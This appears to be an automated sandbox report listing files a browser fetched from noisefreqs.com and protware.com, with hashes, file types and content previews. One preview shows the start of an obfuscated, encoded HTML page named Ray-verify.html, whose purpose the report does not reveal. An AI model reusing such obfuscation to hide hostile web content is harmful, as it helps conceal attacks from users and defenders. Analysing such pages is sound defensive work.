              Preview:if(document.all){Brwsr = "IE"}..if(document.layers){Brwsr = "NN4"}..if(document.getElementById && window.sidebar){Brwsr = "NN6"}..if(navigator.appName =="Opera"){Brwsr = "Opera"}......function MM_reloadPage(init) { //reloads the window if Nav4 resized.. if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {.. document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}.. else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();..}..MM_reloadPage(true);..../*..if(Brwsr != "NN4"){..window.moveTo(0,0);..window.resizeTo(screen.availWidth,screen.availHeight) ..}..*/
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1723
              Entropy (8bit):5.1302673615800485
              Encrypted:false
              SSDEEP:48:oDLjgBhHJ8BNZZNunQLXmPd+h3z8rdnT9h87STc7CZq50:Zhk/w
              MD5:C9AFA1C25E3E12348624038A45283D63
              SHA1:B13BE9CB2C423AA16014C57C038602CA3E253462
              SHA-256:AD1A974D59DB944A911954FEDB4C48CDD18999953B1DF64B2288BBA8027F0D27
              SHA-512:F57DAE08CFE962EB9F37E702B4B3289E04CE4255BF9035FEA9BBFAA7206D75146852EF97858D837B2FC3B6FBAAD27575AA77C1B4AB6ACCC767F64BE652481AE0
              Malicious:false
              Reputation:low
              Preview:if(document.all){Brwsr = "IE"};..if(document.layers){Brwsr = "NN4"};..if(document.getElementById && window.sidebar){Brwsr = "NN6"};..if(navigator.appName =="Opera"){Brwsr = "Opera"};..function noErrMsg(){return true};window.onerror = noErrMsg;..thefile="";theoldfile="";..function checkmf(){..if(document.getElementById){..loc=parent.frames.main.location.href; ..aloc=loc.lastIndexOf('/');filenam1=loc.substring(aloc+1);..thefilearr = filenam1.split(".");..thefile=thefilearr[0];..if(thefile !== theoldfile){..changemenu(thefile,theoldfile)..}..theoldfile = thefile..setTimeout('checkmf()',500)..}..}....function changemenu(thefile,theoldfile){..if(document.getElementById(thefile)!=null){..document.getElementById(thefile).style.color = "black"..document.getElementById(thefile).style.backgroundColor = "white"..}..if(theoldfile.length>1 && document.getElementById(theoldfile)!=null){..document.getElementById(theoldfile).style.color = "white"..document.getElementById(theoldfile).style.backgroundCo
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
              Category:downloaded
              Size (bytes):766
              Entropy (8bit):3.2342808403901246
              Encrypted:false
              SSDEEP:12:IEipQXkdU9E3yQCA0E3Xqxgt2C//lPgXlRxzKVAuV9:IEiY9ClqWLL
              MD5:27D8898F11FDC5EF30A49DF900E32C83
              SHA1:788BB03193ABCD272B425525CEE3C1FE05F0DA40
              SHA-256:60DA098496C6CCC169D52982AB80CD94D52997C677905DF546E88EC6E6C85390
              SHA-512:73D0154F7E6DB33531205CA1CB1BA1FFD7B5B9C5C632F2652A582B11DDC716EFF8C46CB155DBE855EC44D0C76FDA564450C620E25EC901D25EEA04D33C7DE2FF
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/encrypt_html.ico
              Preview:...... ..............(... ...@...................................................................................................wwwwwwwwwp..............ww.....3.......3.wp....;........0wp....3.......33.p....;........3.p....3.......33.p....;........3.p....3.......33.p....;........3.p....3.......33.p....;........3.p....3.......33.p....;........3.p....3.......33.p....;........3.p....3..........p....30.33330.?..........333.............333...p.........p.....p.........p.....p.........p.....p.........w.....p.........www...p........0wwp;...........3................33;..p........................p.....p...........................................................................................................................................?...?....................
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text
              Category:downloaded
              Size (bytes):277
              Entropy (8bit):5.191657765241759
              Encrypted:false
              SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+kntVUzPKBFm8oD:J0+oxBeRmR9etdzRxGezH0quj8+
              MD5:7932D57B3C6C6D4CAD71A551C4BD2A6A
              SHA1:72C16AC290207B94FD46576149BB1191BD098219
              SHA-256:91D8302828ECFCB2742A3B8750D510D1B6B1AAD86CC3BA85155733CD7EEFF3C2
              SHA-512:56331B92B89702327F2BC8DFB99C2F49FDD8EA8813ED7D3276639E19033FF6C6EA6B3B5D328F036FF178ACBA2CAF7788C27DAF01B3DFB610796567B6F7BECA03
              Malicious:false
              Reputation:low
              URL:https://noisefreqs.com/favicon.ico
              Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at noisefreqs.com Port 443</address>.</body></html>.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:GIF image data, version 89a, 30 x 30
              Category:downloaded
              Size (bytes):787
              Entropy (8bit):7.407094208591143
              Encrypted:false
              SSDEEP:12:3A6xOjTIfAd9qpNgewIKGt1wrQ+LwUxsWD4RBJXD60Zrr4J1C3:3yTKAdsNgp2DwLwUqQsJ+0Zom3
              MD5:C408203122166B0F4CD4ADFFEF193755
              SHA1:B94F2F84C30CCB4BEED5AFBDB4DBCF589C0FB358
              SHA-256:8D5910ECA561B6598038A81580E4E6AED9416DDB8DAE614207E25EFB8DBA66F9
              SHA-512:807BE3F945F57EA529EAC07863970088F77F0E36E78E7B276E82482B010AF6DF1BF5573F086C692D633EEFE451D420BED379993E2C4100A8B123027140619B07
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/next.gif
              Preview:GIF89a..........rmmJGG...)((........................................................................................................................|||{{{yyyxxxwwwvvvuuutttqqqpppooonnnmmmjjjhhhfffeeedddcccbbbaaa```]]][[[ZZZYYYXXXVVVTTTSSSRRRQQQLLLKKKJJJIIIHHHGGGFFFEEEBBB>>>===<<<:::888777444333222000///...***)))((("""!!! ........................................................................!.......,........@...........;?'......-Pf9./y...H.cvwwx3......n.d.Dx...xD..54&#%0FZjqu....[eca\$.....H..<.*......:LQXbmqt.yn...5 ...."8Ugqv.x6.1YKv.(.....<..qb...j5..8.....d.s+.)...H.>...yC.*.:o.`..r........).E..8.4.&.I3...p1....(|\Ic.Z.CCRdh.@...1......CQ....!....pbPAS..4Yn.%.c....7`..../.0.2(..7l....&8...C....,g.,........PK.J......CDR;.....l....).[P.........#...;
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):1723
              Entropy (8bit):5.1302673615800485
              Encrypted:false
              SSDEEP:48:oDLjgBhHJ8BNZZNunQLXmPd+h3z8rdnT9h87STc7CZq50:Zhk/w
              MD5:C9AFA1C25E3E12348624038A45283D63
              SHA1:B13BE9CB2C423AA16014C57C038602CA3E253462
              SHA-256:AD1A974D59DB944A911954FEDB4C48CDD18999953B1DF64B2288BBA8027F0D27
              SHA-512:F57DAE08CFE962EB9F37E702B4B3289E04CE4255BF9035FEA9BBFAA7206D75146852EF97858D837B2FC3B6FBAAD27575AA77C1B4AB6ACCC767F64BE652481AE0
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/tpmnu.js
              Preview:if(document.all){Brwsr = "IE"};..if(document.layers){Brwsr = "NN4"};..if(document.getElementById && window.sidebar){Brwsr = "NN6"};..if(navigator.appName =="Opera"){Brwsr = "Opera"};..function noErrMsg(){return true};window.onerror = noErrMsg;..thefile="";theoldfile="";..function checkmf(){..if(document.getElementById){..loc=parent.frames.main.location.href; ..aloc=loc.lastIndexOf('/');filenam1=loc.substring(aloc+1);..thefilearr = filenam1.split(".");..thefile=thefilearr[0];..if(thefile !== theoldfile){..changemenu(thefile,theoldfile)..}..theoldfile = thefile..setTimeout('checkmf()',500)..}..}....function changemenu(thefile,theoldfile){..if(document.getElementById(thefile)!=null){..document.getElementById(thefile).style.color = "black"..document.getElementById(thefile).style.backgroundColor = "white"..}..if(theoldfile.length>1 && document.getElementById(theoldfile)!=null){..document.getElementById(theoldfile).style.color = "white"..document.getElementById(theoldfile).style.backgroundCo
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:GIF image data, version 89a, 30 x 30
              Category:dropped
              Size (bytes):773
              Entropy (8bit):7.356255046101893
              Encrypted:false
              SSDEEP:12:3A6xgOXkfSNX2fdNgedZJ2jFSEgPfWtmdC8ddPu:3YO2SNX21NgoZJ8SYtmhddPu
              MD5:B2B5EDC347313E2671353D83F5CB58B4
              SHA1:AE9407D4923D5207C469EF3283DECB4E88C9E637
              SHA-256:E01F1C6AD2354841791402418BF452F59E56D1861DAFC1FE649EED1F0E9B0E5F
              SHA-512:6EA9913EE29E542E362FA357504A616CBE1F4E77F54033E38AE1959770EE02ACD56FC3FBDA6D2B100214E736909D29D2F738D10F2A602AD319CBC71A2621A089
              Malicious:false
              Reputation:low
              Preview:GIF89a..........rmmJGG...)((..............................................................................................................................|||{{{xxxwwwtttqqqpppooonnnmmmjjjhhhfffeeedddcccbbbaaa```^^^]]][[[ZZZYYYXXXVVVTTTSSSRRRQQQMMMLLLKKKJJJIIIHHHGGGFFFBBB>>>===<<<:::888777444222000///...***)))((("""!!! ...........................................................................!.......,........@...........:>*.....!/$.8sv...H.bsttuk......3.c.Du...uD..43)'(1FZhor....[db`\M.......H..-.;.....9LRXakoq.vl..04$....&7Ufos.u5.2YKt.@AB......Fc..W.I,..S.[.$0EE....j,.(._7$l<..v(..,.....`@...^..q..i.-,c.....8l....3B..:4......H.!c......1$%....(D...A."tbH.!...(H|....ILQ..i.FM....U..fP.8q.D.8.....Yx....v..J...).J..-T.#.!$..-.[.....e..:n.D...8.@.;
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:data
              Category:downloaded
              Size (bytes):10563
              Entropy (8bit):6.1267680196939995
              Encrypted:false
              SSDEEP:192:+YjCOJafYUtZZDrEeRNSwikJr5vL3e0uD4nzEyg57dzhnL8Dwzti2c5BNajv9yWI:+Y+OJaQSrEMNrJr5vrYD4zEyg573LS73
              MD5:D03F21EB9A2F479EB8255B4306ABC3A8
              SHA1:C47CDD7F3CE78E629CBE81924B43FB175100403D
              SHA-256:E0B9ABD66F600FC6A478EC09197DF64EA87F06C4B298C1A3E668B77DD59870AC
              SHA-512:3D97D34D0F385427C24962168EAE28E59E4F46184AE943B9BB73DF418434E9DA096C7B670F3D8133B64D8EE8B1EE36A4C61EECD738B1D857EEF089EB2FBC81CE
              Malicious:false
              Reputation:low
              URL:https://noisefreqs.com/Ray-verify.html
              Preview:<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';p82i0aVMDcn='pRmzEZl3YN8c';</script><script>fnT5TuH=new Array();fnT5TuH[0]='%74%6E%38%32%35%7A%38RN%36%34\154';x5ulR31=new Array();x5ulR31[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.\r.\n.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1547)
              Category:downloaded
              Size (bytes):5395
              Entropy (8bit):5.306255028784809
              Encrypted:false
              SSDEEP:96:Ob7rJRvJm4RLRWRAFJP0RGR7RA/DTXGJ+1/0RGR7RAtvHGJe1Q/D0RGR7RArDHGz:Ob7dRRmK9UAzPOkNA/DTO+1OkNAtv+ee
              MD5:FB4BE4BC2A9F21EC041695D846B7C26E
              SHA1:ED9914258F234031E0EEB9A236B4A9DD7D990575
              SHA-256:6C3B893531658E3814AEE075A71D62571582CEB6AD7479B7E28D07C6B3305D5E
              SHA-512:A9B9CA4433F6C32486C81C0BCF98004405355779C940C5560D5724627DF1AFD657865E096073955C771BE295E7530531397DE9791CD03BB89BB77067D4D9FD6E
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/styleIE.css
              Preview:A:link {COLOR: #000000; FONT-WEIGHT: normal; TEXT-DECORATION: none}A:visited {COLOR: #000000; FONT-WEIGHT: normal; TEXT-DECORATION: none}A:active {BACKGROUND: #FFFFFF; FONT-WEIGHT: bold; color: #000000}A:hover {FONT-WEIGHT: bold; TEXT-DECORATION: none; background-color: #FFFFFF; color: #FF3300}h1 {display:inline;font-family: Verdana, Arial, Helvetica, sans-serif;font-size: 12px;}.s1i:hover {COLOR: #000000; FONT-WEIGHT: normal; TEXT-DECORATION: none}TD {FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; FONT-SIZE: 12px; font-weight: normal}.input {COLOR: #663399; FONT-FAMILY: Courier New, Courier, monospace}.note {BORDER-BOTTOM: silver thin solid; BORDER-LEFT: silver thin solid; BORDER-RIGHT: silver thin solid; BORDER-TOP: silver thin solid; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; PADDING-BOTTOM: 0.3em; PADDING-LEFT: 0.3em; PADDING-RIGHT: 0.3em; PADDING-TOP: 0.3em; border: #333333; font-size: 12px; color: #000099}.figure {FONT-VARIANT: small-caps; FONT-WEIGHT: bold}.htmlg {
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):186
              Entropy (8bit):4.979156162051789
              Encrypted:false
              SSDEEP:3:TMQiceeSMidCXdQCW+plmtJUi1EUFSfKtz5BDEhILiGYsLSWAXKRVLW8evMeYeic:ASBSpCtQCWWmtiUh9VEhI2VsBAXKRhp+
              MD5:C2646B5BDC50CDB6AC072321EF421B68
              SHA1:83D31044A172CBE69DA3CFBE5D9BCE0A333F110B
              SHA-256:4ABD5B6330CF539BBCDF9219FFFB9C9438ED4D4F570F55C40493F81E2182AAE6
              SHA-512:136344A4A23F57743EF061172FB6FD803F7D28A8F90A37783B4C3C17ACF58C01B5625B827EED63713D41A51B20F93A5DF80ADC09C2CEE0BB90A85EE8FAA59101
              Malicious:false
              Reputation:low
              Preview:function ns9(){window.status = "ProtWare's HTML Guardian - the world's standard for website protection - Encrypt HTML, ASP, Javascript, VBscript source.";setTimeout("ns9()",200);};ns9();
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):361
              Entropy (8bit):4.891394041667123
              Encrypted:false
              SSDEEP:6:yL1fkLV55HeyA9L1fkL7NXvA9L1fkLBcE5Hey1O1tubDRdALbDRd7J/Pc5x+tAVq:MfkLVfHfMfkL7RvMfkLBcE5Hf1O1+DR+
              MD5:842A7808AAF0389D68C1A021D9E07C56
              SHA1:305D0A3179C8DC2664B6121C37460970C4908140
              SHA-256:0F40314122979FC6E26EF035BFA4B9EF45F36D78DBDF81000580AD3E6D91153C
              SHA-512:CF83F1B5794095E3767A4B5234594E3046ED3A558F4847D414FF6ECE6FE8FE5547990E2B82C040313BFA724365C2231E2338FDB96C586F33DC5BAEED38CC879D
              Malicious:false
              Reputation:low
              Preview:document.body.style.scrollbarArrowColor="white";..document.body.style.scrollbarFaceColor="#009900";..document.body.style.scrollbarTrackColor="white";....function setodl(){if(document.getElementById){document.getElementById('odl').style.display='none'}};..function unsetodl(){if(document.getElementById){document.getElementById('odl').style.display='inline'}};..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:GIF image data, version 89a, 30 x 30
              Category:dropped
              Size (bytes):787
              Entropy (8bit):7.407094208591143
              Encrypted:false
              SSDEEP:12:3A6xOjTIfAd9qpNgewIKGt1wrQ+LwUxsWD4RBJXD60Zrr4J1C3:3yTKAdsNgp2DwLwUqQsJ+0Zom3
              MD5:C408203122166B0F4CD4ADFFEF193755
              SHA1:B94F2F84C30CCB4BEED5AFBDB4DBCF589C0FB358
              SHA-256:8D5910ECA561B6598038A81580E4E6AED9416DDB8DAE614207E25EFB8DBA66F9
              SHA-512:807BE3F945F57EA529EAC07863970088F77F0E36E78E7B276E82482B010AF6DF1BF5573F086C692D633EEFE451D420BED379993E2C4100A8B123027140619B07
              Malicious:false
              Reputation:low
              Preview:GIF89a..........rmmJGG...)((........................................................................................................................|||{{{yyyxxxwwwvvvuuutttqqqpppooonnnmmmjjjhhhfffeeedddcccbbbaaa```]]][[[ZZZYYYXXXVVVTTTSSSRRRQQQLLLKKKJJJIIIHHHGGGFFFEEEBBB>>>===<<<:::888777444333222000///...***)))((("""!!! ........................................................................!.......,........@...........;?'......-Pf9./y...H.cvwwx3......n.d.Dx...xD..54&#%0FZjqu....[eca\$.....H..<.*......:LQXbmqt.yn...5 ...."8Ugqv.x6.1YKv.(.....<..qb...j5..8.....d.s+.)...H.>...yC.*.:o.`..r........).E..8.4.&.I3...p1....(|\Ic.Z.CCRdh.@...1......CQ....!....pbPAS..4Yn.%.c....7`..../.0.2(..7l....&8...C....,g.,........PK.J......CDR;.....l....).[P.........#...;
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 25x20, components 3
              Category:downloaded
              Size (bytes):771
              Entropy (8bit):6.977699977618139
              Encrypted:false
              SSDEEP:24:o9YMWmqUodphVwB8b01HUrr0coDBRnanBh8G:o9YM1urVwmbeGgmBJ
              MD5:F480CAD23ABA37EC01E2B76298499928
              SHA1:FDE75053ED9079E11BB3C054A0A77CFF93E0D266
              SHA-256:5C6180FDB8E90E1530682949E0CC5CE911E4886F99DAF2AB0D04462CEFB13505
              SHA-512:8E951D154967F43CA35C25FB4BB6DF2F73FB11010B73CE3075E358D8079037E7D0FDBF9F8DF972A557C07E115941132367B07571E957CAF358198C79545C2EC0
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/new3.jpg
              Preview:......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222................................................*.........................1.!2A.."..QSq.................................*......................1.!...Q."a..#Aq...............?...W+..b.v*.....(.l....n1..o]...mL.o...k*.."p{.X..2....fQ...E...A.7...t...A..M....bS.s....=..e.n.n...,e....-.._...|j..Q....h|..N......{.&.K.quR..*l.._v..Kr.....J..@.'lg.}T.l..,`o..p.b..%..].P.;..3...*.xA@.}2D"\....R....{.....A....T*.#.....O._......x8P.....D.L.)..'3......q.[.\E0..Di.%ICHA....w.....Y...e ...q.!..d.7U...\.bw.H..NM_..s....I.Vi.*.P.......ygl..N...4[W.Z$.1"=.<.j."4v..#.).......5...<.$A.....q.p8.P..>`9.u.>.....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text
              Category:downloaded
              Size (bytes):484
              Entropy (8bit):5.513416182294512
              Encrypted:false
              SSDEEP:12:BMQbwTxwU6QclfVImM2SwhSYAWRjV4NbADHGFBfZeqADRpQL:WVxwUsqmM2CYTV4NkTGFpZeqQRi
              MD5:10421A0BEEF80FFF9768E1A4F8879014
              SHA1:37CFDC34DC401DA1597E60F5AA0C269BC2A2209D
              SHA-256:532CCC6EE9A6EDE9B37BA27CD3923F1B1F7EB0A449B4E3079E559B69B876AEE8
              SHA-512:E6405390BB6BB3B93FCE305F5E44342DD48A218E08C0D88EE355BC6C4386379F5520C7AA00C1F80676B1A158C2377C12C57366B3382015401EEB53E00EF80356
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/blank.htm
              Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>.<head>.<title>HTML Guardian</title>.<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">.<link rel="stylesheet" href="styleIE.css" type="text/css">.<script language = "Javascript" src = "frm.js"></script>.</head>..<body bgcolor="#FFFFFF" text="#000000">.. Page was last updated on : February 03, 2023 -->. revision: pw_791XUAT_223fl_AND_NS09221h-175sec_L7004_newhcU2 -->.</body>.</html>.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 25x20, components 3
              Category:dropped
              Size (bytes):771
              Entropy (8bit):6.977699977618139
              Encrypted:false
              SSDEEP:24:o9YMWmqUodphVwB8b01HUrr0coDBRnanBh8G:o9YM1urVwmbeGgmBJ
              MD5:F480CAD23ABA37EC01E2B76298499928
              SHA1:FDE75053ED9079E11BB3C054A0A77CFF93E0D266
              SHA-256:5C6180FDB8E90E1530682949E0CC5CE911E4886F99DAF2AB0D04462CEFB13505
              SHA-512:8E951D154967F43CA35C25FB4BB6DF2F73FB11010B73CE3075E358D8079037E7D0FDBF9F8DF972A557C07E115941132367B07571E957CAF358198C79545C2EC0
              Malicious:false
              Reputation:low
              Preview:......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222................................................*.........................1.!2A.."..QSq.................................*......................1.!...Q."a..#Aq...............?...W+..b.v*.....(.l....n1..o]...mL.o...k*.."p{.X..2....fQ...E...A.7...t...A..M....bS.s....=..e.n.n...,e....-.._...|j..Q....h|..N......{.&.K.quR..*l.._v..Kr.....J..@.'lg.}T.l..,`o..p.b..%..].P.;..3...*.xA@.}2D"\....R....{.....A....T*.#.....O._......x8P.....D.L.)..'3......q.[.\E0..Di.%ICHA....w.....Y...e ...q.!..d.7U...\.bw.H..NM_..s....I.Vi.*.P.......ygl..N...4[W.Z$.1"=.<.j."4v..#.).......5...<.$A.....q.p8.P..>`9.u.>.....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:GIF image data, version 89a, 30 x 30
              Category:downloaded
              Size (bytes):773
              Entropy (8bit):7.356255046101893
              Encrypted:false
              SSDEEP:12:3A6xgOXkfSNX2fdNgedZJ2jFSEgPfWtmdC8ddPu:3YO2SNX21NgoZJ8SYtmhddPu
              MD5:B2B5EDC347313E2671353D83F5CB58B4
              SHA1:AE9407D4923D5207C469EF3283DECB4E88C9E637
              SHA-256:E01F1C6AD2354841791402418BF452F59E56D1861DAFC1FE649EED1F0E9B0E5F
              SHA-512:6EA9913EE29E542E362FA357504A616CBE1F4E77F54033E38AE1959770EE02ACD56FC3FBDA6D2B100214E736909D29D2F738D10F2A602AD319CBC71A2621A089
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/prev.gif
              Preview:GIF89a..........rmmJGG...)((..............................................................................................................................|||{{{xxxwwwtttqqqpppooonnnmmmjjjhhhfffeeedddcccbbbaaa```^^^]]][[[ZZZYYYXXXVVVTTTSSSRRRQQQMMMLLLKKKJJJIIIHHHGGGFFFBBB>>>===<<<:::888777444222000///...***)))((("""!!! ...........................................................................!.......,........@...........:>*.....!/$.8sv...H.bsttuk......3.c.Du...uD..43)'(1FZhor....[db`\M.......H..-.;.....9LRXakoq.vl..04$....&7Ufos.u5.2YKt.@AB......Fc..W.I,..S.[.$0EE....j,.(._7$l<..v(..,.....`@...^..q..i.-,c.....8l....3B..:4......H.!c......1$%....(D...A."tbH.!...(H|....ILQ..i.FM....U..fP.8q.D.8.....Yx....v..J...).J..-T.#.!$..-.[.....e..:n.D...8.@.;
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (493), with CRLF line terminators
              Category:downloaded
              Size (bytes):823
              Entropy (8bit):5.420022913248819
              Encrypted:false
              SSDEEP:24:gXAZK1VVMif6lgRcMq5L/cXBCQAtk9RR+jl:gXn1Hpf66SMq5L/cxrA2CR
              MD5:BBC93A052C83B04D64CF4C0C9B54410C
              SHA1:ADA9DBC8334C54B810F1D04C236E948B743CCA11
              SHA-256:C6BFD896240041BAD440B2B8B1901EB31427949656CD50C508B5263158F0CB3E
              SHA-512:561695CFCD021E1FDC0D0736DD7FBF9F86FE386F15E7389C1D7064032CDEAD91081CC791E8CDE8777E3BCDC3E835DF104874A9CBC71BF2022670B724BFF01447
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/frm.js
              Preview:if ((parent.location.href == self.location.href) && window.name!='qazxswedc'){location.replace('default.htm')};var n8;..function rplc(inpf,fe){...feA=Array('htm','html','asp','php','shtml');...nu=inpf+'.'+feA[fe];...dObj='location'; dVal=''; dAct='.replace("'; dCl='")'; dHex='0xBB';...eval(dObj+dAct+dVal+nu+dCl);.......... ..}..function rwl(inp){if(document.getElementById){nulk= Array('k-data::3','source_browser::9','security-set_6::2','v_debug_a::0','directory_7::2','corp_mngr_7::1','compare_encrypt_7::1','corp_data::0','security_audit_6::3','compare_ipr::4');feM=Array('htm','html','asp','php','shtml');c=n8?'obj=':'href=';for(i=0;i<inp.length;i++){a=nulk[inp[i]].slice(0,nulk[inp[i]].indexOf('::'));b=nulk[inp[i]].slice(nulk[inp[i]].indexOf('::')+2);eval("document.getElementById(inp[i])"+"."+c+"a+'.'+feM[b]");}}}
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (493), with CRLF line terminators
              Category:dropped
              Size (bytes):823
              Entropy (8bit):5.420022913248819
              Encrypted:false
              SSDEEP:24:gXAZK1VVMif6lgRcMq5L/cXBCQAtk9RR+jl:gXn1Hpf66SMq5L/cxrA2CR
              MD5:BBC93A052C83B04D64CF4C0C9B54410C
              SHA1:ADA9DBC8334C54B810F1D04C236E948B743CCA11
              SHA-256:C6BFD896240041BAD440B2B8B1901EB31427949656CD50C508B5263158F0CB3E
              SHA-512:561695CFCD021E1FDC0D0736DD7FBF9F86FE386F15E7389C1D7064032CDEAD91081CC791E8CDE8777E3BCDC3E835DF104874A9CBC71BF2022670B724BFF01447
              Malicious:false
              Reputation:low
              Preview:if ((parent.location.href == self.location.href) && window.name!='qazxswedc'){location.replace('default.htm')};var n8;..function rplc(inpf,fe){...feA=Array('htm','html','asp','php','shtml');...nu=inpf+'.'+feA[fe];...dObj='location'; dVal=''; dAct='.replace("'; dCl='")'; dHex='0xBB';...eval(dObj+dAct+dVal+nu+dCl);.......... ..}..function rwl(inp){if(document.getElementById){nulk= Array('k-data::3','source_browser::9','security-set_6::2','v_debug_a::0','directory_7::2','corp_mngr_7::1','compare_encrypt_7::1','corp_data::0','security_audit_6::3','compare_ipr::4');feM=Array('htm','html','asp','php','shtml');c=n8?'obj=':'href=';for(i=0;i<inp.length;i++){a=nulk[inp[i]].slice(0,nulk[inp[i]].indexOf('::'));b=nulk[inp[i]].slice(nulk[inp[i]].indexOf('::')+2);eval("document.getElementById(inp[i])"+"."+c+"a+'.'+feM[b]");}}}
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with very long lines (384)
              Category:downloaded
              Size (bytes):8475
              Entropy (8bit):4.863190058472727
              Encrypted:false
              SSDEEP:192:RLeFayWmEb7kREYP/XqwobpsOIucSyWyULBg:sufMESvqwobpPXTyULBg
              MD5:481795E855B91B634B7E455A4A52A09F
              SHA1:EA4FD121ECB173A3839A2E315829A371EA069D10
              SHA-256:7382458696320A2C261AE9452E96726EC11AD1D54144B28C9AAE66255F336E7E
              SHA-512:E0E96DA2E63274FC9FAF1F73DBC421C65D8EB6DDA1DDDF1D7D7FE4BE7F2A68B1ED95443AB08285BCAC05E393228AFA33B292179E0F98E4EDB1F3282DE01E1A60
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/home.htm
              Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>.<head>.<title>Encrypt HTML, Javascript, ASP. Protect links &amp; images</title>.<META name="keywords" content="Encrypt,protect,html,javascript,asp,vbscript,code,email,scramble ">.<META name="description" content="Encrypt protect html javascript asp email scramble">.<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">.<link rel="stylesheet" href="styleIE.css" type="text/css">.<script language = "Javascript" src = "frm.js"></script><script src="stat.js"></script>..</head>..<body bgcolor="#FFFFFF" text="#000000">..<script language="JavaScript" src="scroll.js"></script>...<table width="90%" border="0" align="center" >. <tr>. <td><div align="center"><span class="bo">February 2023</span>: HTML Guardian<font color="#009900" class="bo"> . Version 7.9.1 [b.227]</font> is now available. Read what's new <a href="history.htm"><font color="#0000FF" class="bo">here</font></a> . .</div></td>. <
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (551)
              Category:downloaded
              Size (bytes):2134
              Entropy (8bit):5.289520071374941
              Encrypted:false
              SSDEEP:48:XFhJZsE1dVD/Bb0RGR7RArDE+GJZaFo0RGR7RA/DEYXqBf1/0RGR7RAtvE+GJZa8:VhJCEHVD/h0RGR7RArDHGJeo0RGR7RAg
              MD5:66374F067C89D680D7653D686C2C9E2B
              SHA1:2C7928F01614468A698350C3B1DEF7A95AAEF878
              SHA-256:FEB497BF0525D6B954CD1D6E1A28936A1F69023DEC3121C21F4F8260991DD8A7
              SHA-512:938DCEC5F172F57757CE69BCD94A4E0D6C1D248C60FE3F85BD8A3818F756230A2BBE762091BD8F85EC2A09AB3707809F63BFE46B94E8F1F2355503EFC355866C
              Malicious:false
              Reputation:low
              URL:http://www.protware.com/style_M.css
